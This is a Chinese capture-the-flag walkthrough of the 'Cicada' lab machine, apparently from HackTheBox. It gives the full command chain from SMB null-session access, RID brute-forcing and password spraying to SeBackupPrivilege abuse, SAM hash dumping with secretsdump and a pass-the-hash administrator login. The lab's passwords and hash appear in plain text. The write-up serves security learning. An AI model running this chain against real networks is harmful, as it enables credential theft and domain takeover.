Cicada

端口扫描

1
2
3

nmap 10.10.11.35

扫描结果

smb连接

发现开放445端口有smb服务,连接试试

1
2
3
4
5

smbclient -L //10.10.11.35



发现需要密码使用免密登录试试

1
2
3
4
5
6
7

smbclient -N //10.10.11.35

或者

enum4linux -a -u guest 10.10.11.35

把这个文件下载下来看看

1
2
3

get "Notice from HR.txt"

获取到一个默认的密码Cicada$M6Corpb*@Lp#nZp!8

Rid爆破

**crackmapexec **工具使用:https://www.cnblogs.com/Yang34/p/14411497.html

1
2
3
4
5
6
7

crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"

或者

nxc smb 10.10.11.35 -u guest -p '' --rid-brute --users

这是两个工具爆破得到的结果

其实都是差不多的可以得到用户名列表

1
2
3

john.smouldersarah.danteliamichael.wrightsondavid.oreliousemily.oscars

遍历用户名密码看哪个正确

1
2
3

crackmapexec ldap cicada.htb -u usernames.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

发现对michael.wrightson用户可用

enum4linux-ng扫描

使用enum4linux-ng搜集所有与smb服务有关的信息

1
2
3

enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

发现了david的密码:aRt$Lp#7t*VQ!3

使用该用户进行smb连接

可以看到有一个文件下载下来使用get “文件名”命令

发现了用户名和密码

winrm登录

1
2
3

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

使用evil-winrm 登录得到用户的flag

SeBackupPrivilege

查看当前用户的权限

关于这个 SeBackupPrivilege:Windows Privilege Escalation: SeBackupPrivilege – Hacking Articles

pypykatz

使用 pypykatz 得到 admin 的 hash 值

impacket-secretsdump

或者使用impacket-secretsdump工具

1
2
3

impacket-secretsdump -sam sam -system system LOCAL

最后使用 evil-winrm 的 hash 登录到 admin,得到 root.txt

1
2
3

evil-winrm -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35